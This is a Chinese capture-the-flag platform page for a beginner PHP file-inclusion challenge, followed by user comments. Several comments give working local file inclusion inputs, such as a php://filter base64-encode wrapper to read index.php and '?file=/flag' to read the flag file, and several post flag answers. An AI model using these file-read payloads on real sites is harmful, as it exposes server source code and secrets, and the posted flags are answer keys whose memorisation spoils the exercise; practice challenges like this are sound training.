文件包含WEB 未解决

分数: 20 金币: 2
题目作者: harry
一  血: 不会CTF的麻风
一血奖励: 1金币
解  决: 12595
提  示:
描  述:
flag{}
评论
HK1ng 11月前

使用伪协议来解题,启动靶机发现有超链接,点击后发现有file变量,然后页面有index.php,于是猜想是不是传一个index.php,果然不是。然后就给出这个提示,想办法去读一下这个,然后这里就是用了php://filter/read=convert.base64encode/resource=filepath,表示以base64编码的方式进行读取指定路径的文件。然后解码就可以看到。

回复 4

000ooo 1年前

/index.php?file=/flag

回复 1
哈哈哈嘿嘿嘿 8月前

为什么

回复 0

Zhumeng 1年前

php伪协议读取index.php

回复 1
Jiafeng 12月前

我在你的评论下面补充全吧:php://filter/convert.base64-encode/resource=index.php

回复 0

Wang_Micro 1年前

flag{642c1d8cf84d01e3a2df403e83d3e43b}

回复 0

33555 1年前

/index.php?file=///flag

回复 2

Pearpeach1 1年前

?file=php://filter/read=convert.base64-encode/resource=index.php

回复 0

hao7 1年前

flag{dff1aea3fcdd906ce70c1998addf1ccc}

回复 0

17795946336 1年前

flag{159cf1e0d16cf846e61ae8a3ba27e912}

回复 1

Z20g00d 1年前

flag{38cc5dc6199822623663592b58cec109}

回复 0

LLTVLL 1年前

flag{f0adcfcdc97d8d4a62d7fc2e6aaf49b8}

回复 0

WriteUp

image
harry

2 金币

评分(11)

解题动态

zzuer 攻破了该题 1天前
Finiy 攻破了该题 1天前
qsy 攻破了该题 1天前
月光照流年 攻破了该题 1天前
Zhengzanmei 攻破了该题 1天前
Fengyu3321 攻破了该题 1天前
edu123 攻破了该题 1天前
2562248320 攻破了该题 2天前
白菜白又白 攻破了该题 2天前
igrazee 攻破了该题 2天前
邪恶的番茄 攻破了该题 2天前
Yuyukon 攻破了该题 2天前
Despa1r 攻破了该题 2天前
huluobu 攻破了该题 3天前
不知道不晓得 攻破了该题 3天前
2360657787 攻破了该题 3天前
林夕言 攻破了该题 3天前
顾无澜 攻破了该题 3天前
铭风 攻破了该题 3天前
66666ctfxr 攻破了该题 3天前
问题反馈